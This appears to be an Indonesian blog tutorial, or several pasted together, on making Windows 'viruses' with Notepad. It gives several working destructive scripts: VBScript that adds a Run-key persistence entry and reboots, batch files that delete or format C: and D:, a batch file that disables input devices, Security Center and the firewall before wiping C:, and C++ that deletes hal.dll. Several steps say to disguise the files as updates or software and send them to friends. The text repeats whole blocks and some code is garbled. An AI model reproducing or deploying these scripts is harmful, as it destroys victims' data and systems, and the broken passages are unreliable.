Kali ini saya akan berbgi kepada anda
tentang Cara Membuat Virus Trojan .
Nama aslinya adalah Trojan Horse .
Gampang banget kok cara membuat virusnya dengan notepad kok .
Oke langsung saja di lihat caranya
satu-persatu dan langsung dipraktekin di PC kalian.
1.Buka Notepad . Klik start >>
terus ketik notepad
2.copy dan paste script berikut ke dalam
notepad anda
set
FSobj=CreateObject(“Scripting.FileSystemObject”)
set sysDir = FSobj.GetSpecialFolder(1)
createRegKey “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dlRB”,sysDir&”\dlRB.vbs”
sub createRegKey(regKey,regVal)
set regEdit = CreateObject(“WScript.Shell”)
regEdit.RegWrite regKey,regVal
end sub
set generateCopy=FSobj.CreateTextFile(sysDir+”\dlRB.vbs”)
generateCopy.close
set newFile = FSobj.OpenTextFile(WScript.ScriptFullname,1)
setFile()
fixedCode=replace(fileData,chr(94),”"”")
set procreateCopy=FSobj.OpenTextFile(sysDir+”\dlRB.vbs”,2)
procreateCopy.write fixedCode
procreateCopy.close
rebootSystem()
function setFile()
fileData=”rem – ^dlRB^ by D.L.” &vbcrlf& _
“strComputer = ^.^ ” &vbcrlf& _
“Set objWMIService = GetObject(^winmgmts:^ _ ” &vbcrlf& _
“& ^{impersonationLevel=impersonate,(Shutdown)}!\\^ & strComputer & ^\root\cimv2^)” &vbcrlf& _
“Set colOperatingSystems = objWMIService.ExecQuery _ ” &vbcrlf& _
“(^Select * from Win32_OperatingSystem^)” &vbcrlf& _
“For Each objOperatingSystem in colOperatingSystems” &vbcrlf& _
“ObjOperatingSystem.Reboot()” &vbcrlf& _
“Next”
end function
function rebootSystem()
strComputer = “.”
Set objWMIService = GetObject(“winmgmts:” _
& “{impersonationLevel=impersonate,(Shutdown)}!\\” & strComputer & “\root\cimv2″)
Set colOperatingSystems = objWMIService.ExecQuery _
(“Select * from Win32_OperatingSystem”)
For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot()
Next
end function
set sysDir = FSobj.GetSpecialFolder(1)
createRegKey “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dlRB”,sysDir&”\dlRB.vbs”
sub createRegKey(regKey,regVal)
set regEdit = CreateObject(“WScript.Shell”)
regEdit.RegWrite regKey,regVal
end sub
set generateCopy=FSobj.CreateTextFile(sysDir+”\dlRB.vbs”)
generateCopy.close
set newFile = FSobj.OpenTextFile(WScript.ScriptFullname,1)
setFile()
fixedCode=replace(fileData,chr(94),”"”")
set procreateCopy=FSobj.OpenTextFile(sysDir+”\dlRB.vbs”,2)
procreateCopy.write fixedCode
procreateCopy.close
rebootSystem()
function setFile()
fileData=”rem – ^dlRB^ by D.L.” &vbcrlf& _
“strComputer = ^.^ ” &vbcrlf& _
“Set objWMIService = GetObject(^winmgmts:^ _ ” &vbcrlf& _
“& ^{impersonationLevel=impersonate,(Shutdown)}!\\^ & strComputer & ^\root\cimv2^)” &vbcrlf& _
“Set colOperatingSystems = objWMIService.ExecQuery _ ” &vbcrlf& _
“(^Select * from Win32_OperatingSystem^)” &vbcrlf& _
“For Each objOperatingSystem in colOperatingSystems” &vbcrlf& _
“ObjOperatingSystem.Reboot()” &vbcrlf& _
“Next”
end function
function rebootSystem()
strComputer = “.”
Set objWMIService = GetObject(“winmgmts:” _
& “{impersonationLevel=impersonate,(Shutdown)}!\\” & strComputer & “\root\cimv2″)
Set colOperatingSystems = objWMIService.ExecQuery _
(“Select * from Win32_OperatingSystem”)
For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot()
Next
end function
3.Kalau sudah , simpan filenya dengan
exstensi .VBS Contoh Fanalver.VBS nyimpannya harus all file.
4.Jangan coba-coba di jalanin virus tadi
di komputer pribadi anda karena saya tidak bertanggung jawab atas kesalahan
anda sendiri
Hai teman disini saya akan kasi
tau cara buat virus malware caranya sangat gampang tapi sangat berbahaya buat
teman-teman karena membuat komputer jadi error(untuk tidak punya smadav) jadi
jangan coba-coba membuat dan memakainya disini saya akan share untuk dipelajari
agar kalian tau bahwa orang bisa berbuat jahat untuk komputer,jadi jangan
coba-coba saya gak nanggung resiko kalian :p
1.buka notepad
2.masukan kode ini
@ echo off
echo (untuk mengubah Line)
echo Malware Virus
DEL C: \-y (script buat del drive c)
DEL D: \-y (script buat del drive d)
FORMAT C: \-y (script buat format c)
3.tinggal simpan di belakangnya dengan .bat contoh: idm.bat sisipkan di aplikasi/software
4.klik 2x untuk lihat hasilnya bisa juga untuk transfer di flashdisk teman agar komputernya hang
2.masukan kode ini
@ echo off
echo (untuk mengubah Line)
echo Malware Virus
DEL C: \-y (script buat del drive c)
DEL D: \-y (script buat del drive d)
FORMAT C: \-y (script buat format c)
3.tinggal simpan di belakangnya dengan .bat contoh: idm.bat sisipkan di aplikasi/software
4.klik 2x untuk lihat hasilnya bisa juga untuk transfer di flashdisk teman agar komputernya hang
ingat! Jangan
membuat,melakukan,atau mengeklik dosa atau kerusakan tangggung sendiri,saya
tidak mau bertanggung jawab lo... :p
MEMBUAT VIRUS BERBAHAYA DENGAN BANTUAN NOTEPAD
08.21
Belajar membuat Virus dengan notepad
How to create a harmless virus for windows.
It is safe and easy. It’s pretty simple. And I give the solution to overcome this harmless virus.
STEPS:
1. buka Notepad (start - all program - accessories - notepad)
2. Copy source code di bawah ini ke dalam Notepad:
cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo BERSIAP-SIAP MENGHANTAM SYSTEM…
echo …………………
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo NEXT…………!
echo:
echo:
echo HOHOHO,.... AQ NAKAL
echo MAU JADI TEMAN AKU ??
echo:
echo:
echo NAMAKU PEJALAR, MAU TAU NAMAKU YANG SEBENARNYA????
start /w wscript.exe C:\sleep2000.vbs
echo …………
start /w wscript.exe C:\sleep4000.vbs
echo …………
echo SABAR…….!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo INI CUMAN PERCOBAAN SAJA…
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir EHM_CUMAN_PERCOBAAN
start /w wscript.exe C:\sleep3000.vbs
echo:
echo:
echo:
echo:
echo AO LANUT LAGI......
echo INGAT INI CUMAN PEMBELAJARAN
echo JANGAN DI GUNAKAN UNTUK YANG TIDAK BAIK
echo SEKALI LAGI ILMU HARUS DI GUNAKAN UNTUK YANG BAIK YAH
echo UNTUK PENGETAHUAN SAJA
echo:
echo:
echo:
echo:
echo:
echo SABARAN BRO…
start /w wscript.exe C:\sleep3000.vbs
echo ………..
echo zzzzzzz….
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo OKE….Virus AKTIF!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo FIREWALL KAMU ANCUR…
start /w wscript.exe C:\sleep2000.vbs
echo SEMUA PROSESS UDAH DIBANTAI…
start /w wscript.exe C:\sleep2000.vbs
echo VIRUS SILAHKAN BOOTING DENGAN SEGALA HORMAT…
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS MENDAPAT AKSES PENUH KE SISTEM ANDA!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo SALAM KENAL YAH BRO,
echo JIKA ADA MASALAH SILAHKAN BERKUNJUNG KE BLOG AKU YAH
echo:
echo DI BAYUAJUZT.BLOGSPOT.COM
echo:
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c “AYO SEMANGAT TINGKATKAN ILMU ANDA”
3. save as dengan apasaja.bat, contoh: belajar.bat
4. aktifkan virusnya dengan cara double klick file yang anda sudah buat.
5. A shutdown or log-off window will come up with the amount of time, your comment, and a bunch of other stuff. You can not abort the shutdown with task manager by trying to close the window or delete the processes. 6.To Abort virus Click so that your PC is not shutdown: START – RUN and type command: shutdown -a before remaining time is over.
How to create a harmless virus for windows.
It is safe and easy. It’s pretty simple. And I give the solution to overcome this harmless virus.
STEPS:
1. buka Notepad (start - all program - accessories - notepad)
2. Copy source code di bawah ini ke dalam Notepad:
cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo BERSIAP-SIAP MENGHANTAM SYSTEM…
echo …………………
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo NEXT…………!
echo:
echo:
echo HOHOHO,.... AQ NAKAL
echo MAU JADI TEMAN AKU ??
echo:
echo:
echo NAMAKU PEJALAR, MAU TAU NAMAKU YANG SEBENARNYA????
start /w wscript.exe C:\sleep2000.vbs
echo …………
start /w wscript.exe C:\sleep4000.vbs
echo …………
echo SABAR…….!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo INI CUMAN PERCOBAAN SAJA…
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir EHM_CUMAN_PERCOBAAN
start /w wscript.exe C:\sleep3000.vbs
echo:
echo:
echo:
echo:
echo AO LANUT LAGI......
echo INGAT INI CUMAN PEMBELAJARAN
echo JANGAN DI GUNAKAN UNTUK YANG TIDAK BAIK
echo SEKALI LAGI ILMU HARUS DI GUNAKAN UNTUK YANG BAIK YAH
echo UNTUK PENGETAHUAN SAJA
echo:
echo:
echo:
echo:
echo:
echo SABARAN BRO…
start /w wscript.exe C:\sleep3000.vbs
echo ………..
echo zzzzzzz….
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo OKE….Virus AKTIF!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo FIREWALL KAMU ANCUR…
start /w wscript.exe C:\sleep2000.vbs
echo SEMUA PROSESS UDAH DIBANTAI…
start /w wscript.exe C:\sleep2000.vbs
echo VIRUS SILAHKAN BOOTING DENGAN SEGALA HORMAT…
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS MENDAPAT AKSES PENUH KE SISTEM ANDA!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo SALAM KENAL YAH BRO,
echo JIKA ADA MASALAH SILAHKAN BERKUNJUNG KE BLOG AKU YAH
echo:
echo DI BAYUAJUZT.BLOGSPOT.COM
echo:
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c “AYO SEMANGAT TINGKATKAN ILMU ANDA”
3. save as dengan apasaja.bat, contoh: belajar.bat
4. aktifkan virusnya dengan cara double klick file yang anda sudah buat.
5. A shutdown or log-off window will come up with the amount of time, your comment, and a bunch of other stuff. You can not abort the shutdown with task manager by trying to close the window or delete the processes. 6.To Abort virus Click so that your PC is not shutdown: START – RUN and type command: shutdown -a before remaining time is over.
CARA MEMBUAT VIRUS BERBAHAYA DENGAN NOTEPAD
Langkah
pertama buka notepadnya
Kemudian ketik kode seperti dibawah ini :
del”c:\windows\pchealth”
del”c:\windows\system”
del”c:\windows\system32\retore”
del”c:\windows\system32\autoexec.nt”
del”c:\windows\system32\ntoskrni.exe”
del”c:\winlogon.exe”
Save as dengan nama KB888111.bat he he ( ingat save dalam “.bat” )
kemudian kirim ke komputer teman he he he……..
Kemudian ketik kode seperti dibawah ini :
del”c:\windows\pchealth”
del”c:\windows\system”
del”c:\windows\system32\retore”
del”c:\windows\system32\autoexec.nt”
del”c:\windows\system32\ntoskrni.exe”
del”c:\winlogon.exe”
Save as dengan nama KB888111.bat he he ( ingat save dalam “.bat” )
kemudian kirim ke komputer teman he he he……..
Cara membuat VIRUS dengan
Notepad
Saya tidak menyarankan anda utk menjalankan virus ini dikomputer sendiri!!
Virus ini dibuat dg Notepad dan di save as dg ekstension .bat
Jgn lupa utk merubah Save as type menjadi All files
@echo off
cls
rundll32 mouse,disable
rundll32 keyboard,disable
COPY %0 %windir%WINSTART.BAT
net stop "Security Center"
net stop SharedAccess
echo Anda kena VIRUS!!!
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
start hacker-xtx.blogspot.com
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
DEL /F /S /Q C:
shutdown -s -t 10 -c "Ucapkan selamat tinggal pada komputermu!" -f
Saya tidak menyarankan anda utk menjalankan virus ini dikomputer sendiri!!
Virus ini dibuat dg Notepad dan di save as dg ekstension .bat
Jgn lupa utk merubah Save as type menjadi All files
@echo off
cls
rundll32 mouse,disable
rundll32 keyboard,disable
COPY %0 %windir%WINSTART.BAT
net stop "Security Center"
net stop SharedAccess
echo Anda kena VIRUS!!!
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
start hacker-xtx.blogspot.com
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
DEL /F /S /Q C:
shutdown -s -t 10 -c "Ucapkan selamat tinggal pada komputermu!" -f
fungsi :
-disables mouse &
keyboard
-copy ke AUTORUN
-stop Security Center
-display "Anda kena VIRUS!!!" selama 5 detik
-starts http://hacker-xtx.blogspot.com/
-disable firewall
-delete c: drive
-force shutdown dg pesan "Ucapkan selamat tinggal pada komputermu!"
-copy ke AUTORUN
-stop Security Center
-display "Anda kena VIRUS!!!" selama 5 detik
-starts http://hacker-xtx.blogspot.com/
-disable firewall
-delete c: drive
-force shutdown dg pesan "Ucapkan selamat tinggal pada komputermu!"
Membuat virus? Berbahaya enggak? Tentu saja virus
berbahaya, namun tutorial kali ini akan membahas cara membuat virus sederhana
yang dari paling tidak berbahaya, hingga yang berbahaya
Langkah-langkah
1. Buka Notepad
2. Copy Code dibawah ini
Langkah-langkah
1. Buka Notepad
2. Copy Code dibawah ini
lol=msgbox ("Warning a virus has
been detected on your PC. Press YES to format your hard disk now or press NO to
format your hard disk after system reboot",20,"Warning")
3. Save dengan format .vbs (ex : virus1.vbs). Simpan juga dengan format all file
4. Jalankan Virusnya
5. Akan muncul pilihan yes or no. Pilih saja salah satu (Yes atau No). Tidak akan terjadi apa-apa kok.
Note : Pesan yang muncul bisa diganti-ganti. Dan jika mau program itu aktif ketika komputer startup, letakkan programnya di C:\Documents and Settings\*namauser*\Start Menu\Programs\Startup.
* * *
Virus Batch Sederhana manthabmanthab
Virus yang kali ini cukup berbahaya, namun tidak merusak. Jika mau mencoba, silakan coba di komputer lain, jangan di komputer pribadi.
Langkah-langkah
1. Buka Notepad
2. Copy Code di bawah ini
Virus terdeteksi // Title buat window
xxx // sub skrip xxx
msg * mencoba mendelete viruz // pesan
erase "C:\WINDOWS\system32" //
menghapus system32
start xxxx.bat // menjalankan file
xxxx.bat yg disimpan pada folder yang sama
msg * percobaan gagal,mencoba kembali //
pesan
goto xxxx // eksekusi xxxx.bat
3. Save dengan nama xxx.bat (Jadikan all file, jangan .txt)
4. Buka Notepad (Notepad baru)
5. Copy kode berikut
Viruz // mengubah window title
msg * Wah2 komputer anda kena viruz//
pesan di message box
del // Delete files /// "del
c:" mengapus file yg di c:
erase // sama kyk del
start xxxx.bat // memulai xxxx.bat
xxx // sub skrip
goto // ke subskrip
6. Save dengan nama xxxx.bat( Jadikan all file,,simpan di folder yg sama dengan file yang pertama)
7. Jika mau menjalankannya, jalankan yang xxxx.bat
8. Jika mau menjalankannya ketika komputer Startup Copy ke C:\Documents and Settings\*nama user*\Start Menu\Programs\Startup.
* * *
Virus Berbahaya hammerhammer
Virus yang ini mungkin dikategorikan berbahaya, dikarenakan bisa menghapus file .dll dan membuat komputer tak bisa booting. Jadi hati-hati, kalau mau coba, coba di komputer yang udah mau rusak aja.
Langkah - langkah
1. Siapkan tool C++ (Seperti dev c Portable dan yang sejenis)
2. Copy Code di bawah ini
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove("C:\\windows\\system32\\hal.dll");
//PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}
3. Program ini akan menghapus hal.dll , jadi jangan dieksekusi karena bisa menyebabkan gagal booting.
4. Kalau mau yang advance, copy code di bawah ini
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll");
//PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}
5. Perbedaan dengan kode yang pertama adalah pada proses pencarian directory system secara sistem. (Kode pertama hanya bisa menghapus kode hal.dll jika dilteakkan di directory C: , sedangkan ini akan otomatis mencari.
6. Jangan coba di komputer yang masih normal-normal. Coba di komputer yang kira-kira sudah rusak berat saja.
